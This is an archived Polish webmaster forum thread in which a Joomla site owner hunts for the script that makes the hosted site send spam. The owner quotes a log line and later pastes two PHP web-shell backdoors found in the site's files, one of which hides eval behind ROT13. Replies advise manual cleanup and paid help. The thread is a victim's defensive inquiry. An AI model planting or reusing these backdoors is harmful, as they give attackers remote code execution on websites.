PDA

Zobacz pełną wersję : Skrypt rozsyłający spam jak go znaleźć?



hizel
20-02-2017, 20:01
Strona w AZ.pl, administrator zgłasza mi że moja strona rozsyła z jakiegoś skryptu rozsyła spam. Skrypt który podstawia losowy adres nadawcy w mojej domenie. Robi sobie losowe adresy w mojej domenie np "hilario@mojadomena.pl"
Fragment loga:
2017-02-20 11:53:25 [29165] H=(mata.com) [84.38.130.58]:40015 I=[46.242.145.22]:25 F=<info@apple.com> rejected RCPT <hilario@domena.pl>: SPF: 84.38.130.58 is not allowed to send mail from apple.com
Jomla i dodatki aktualne.
Skanowałem antywirusem dostępnym w cPanel ale nic nie znalazł.

mjmartino
20-02-2017, 20:43
Ręczna robota trzeba przejrzeć trochę plików, ściągnij kopie i udanego polowania ;)
Niema uniwersalnego rozwiązania w poszukiwaniach tego typu skryptów bo każdy jest inny.

hizel
20-02-2017, 21:13
W katalogu images znalazłem coś takiego jak stat.php Nie wiem co to jest?

wywalone /@palyga007

palyga007
20-02-2017, 21:28
jak masz życzenie to wystaw to w formie pliku z linkiem do pobrania, nie ma sensu ładować tego do posta

hizel
20-02-2017, 22:39
W katalogu components\com_contact\views\category\ znalazłem plik com_contact_info.php a w nim:
<?php ($_=@$_GET[c]).@$_($_POST["h644k7"])?>
W czystej joomli go nie ma co to jest?

hizel
20-02-2017, 23:31
Kolejny podejrzany plik który znalazłem to bin-67.php w katalogu: media/plg_qickicon_joomlaupdate
a jego zawartość to:
<?php if($_GET['test']){echo 'success';}else{($www= $_POST['bnw4w']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}

PeFik
21-02-2017, 00:47
Polecam przeczytać rozdział 6 >> http://helion.pl/view/3926o/jowozr.htm

hizel
21-02-2017, 01:16
Z pewnością to zrobię ale zanim kupię książkę administrator zablokuje mi konto hostingowe. :(

palyga007
21-02-2017, 09:32
Jeśli nie wiesz jak to ogarnąć to najlepszym rozwiązaniem pozostaje Ci dział zleceń. Nikt przy użyciu szklanej kuli ci www nie wyczyści.

Bazyl
21-02-2017, 12:08
...i zwróć uwagę, że zlikwidujesz skutek, a nie przyczynę...

hizel
21-02-2017, 13:40
...i zwróć uwagę, że zlikwidujesz skutek, a nie przyczynę...
zdaję sobie z tego sprawę, system i dodatki mam zaktualizowane, hasła zmienione. Szukam przyczyny.
Co do tego programu antywirusowego. Czy on na pewno jest bezpieczny? Nie znam tego programu. Pliki mam ściągnięte, przeglądam je i usunąłem już kilka które nie należą do joomli ani dodatków które mam zainstalowane.

Bazyl
21-02-2017, 15:05
...czyli usunie nadmiarowe pliki, a nie dziurę...

PeFik
21-02-2017, 17:37
Możesz kupić e-booka, książka dostępna 60 sekund po zakupie >> http://helion.pl/view/3926o/jowozr.htm
Zawsze możesz sobie wydrukować jeden rozdział, jesli czytanie z ekranu cię drażni.. Trzeba widzieć szanse, możliwości, a nie tylko ograniczenia.
Czyszczenie strony to koszt 200-400zl ...